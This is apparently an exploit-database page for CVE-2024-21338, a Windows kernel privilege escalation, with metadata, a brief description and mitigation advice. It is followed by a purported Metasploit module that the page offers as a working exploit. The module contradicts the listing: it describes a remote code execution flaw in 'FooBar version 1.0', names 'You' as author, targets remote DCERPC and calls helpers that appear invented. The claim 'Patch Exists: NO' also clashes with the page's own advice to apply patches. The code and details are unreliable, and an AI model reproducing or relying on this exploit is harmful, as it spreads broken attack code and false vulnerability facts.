Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation

vendor:

Windows

by:

E1 Coders

6.1

CVSS

HIGH

Kernel Privilege Escalation

CWE

Product Name: Windows

Affected Version From: Windows 10.0.17763.5458

Affected Version To: Windows 10.0.17763.5458

Patch Exists: NO

Related CWE: CVE-2024-21338

CPE: o:microsoft:windows:10.0.17763.5458

Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2024-21338/

Other Scripts:

Platforms Tested: Windows

2024

Microsoft Windows 10.0.17763.5458 – Kernel Privilege Escalation

The exploit targets Microsoft Windows 10.0.17763.5458 and allows for a privilege escalation within the kernel. By exploiting this vulnerability, an attacker could potentially gain elevated privileges on the system.

Mitigation:

To mitigate this vulnerability, users should regularly apply security patches provided by Microsoft for Windows systems. Additionally, implementing least privilege principles and restricting access rights can help reduce the risk of privilege escalation attacks.

Source

Exploit-DB raw data:

#############################################
# Exploit Title :  Microsoft Windows 10.0.17763.5458 - Kernel Privilege Escalation
# Exploit Author: E1 Coders
# CVE: CVE-2024-21338
#############################################

 
require 'msf/core'
 
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::Remote::DCERPC
  include Msf::Exploit::Remote::DCERPC::MS08_067::Artifact
 
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'CVE-2024-21338 Exploit',
        'Description' => 'This module exploits a vulnerability in FooBar version 1.0. It may lead to remote code execution.',
        'Author' => 'You',
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2024-21338']
        ]
      )
    )
 
    register_options(
      [
        OptString.new('RHOST', [true, 'The target address', '127.0.0.1']),
        OptPort.new('RPORT', [true, 'The target port', 1234])
      ]
    )
  end
 
  def check
    connect
 
    begin
      impacket_artifact(dcerpc_binding('ncacn_ip_tcp'), 'FooBar')
    rescue Rex::Post::Meterpreter::RequestError
      return Exploit::CheckCode::Safe
    end
 
    Exploit::CheckCode::Appears
  end
 
  def exploit
    connect
 
    begin
      impacket_artifact(
        dcerpc_binding('ncacn_ip_tcp'),
        'FooBar',
        datastore['FooBarPayload']
      )
    rescue Rex::Post::Meterpreter::RequestError
      fail_with Failure::UnexpectedReply, 'Unexpected response from impacket_artifact'
    end
 
    handler
    disconnect
  end
end
 
 
#refrence :  https://nvd.nist.gov/vuln/detail/CVE-2024-21338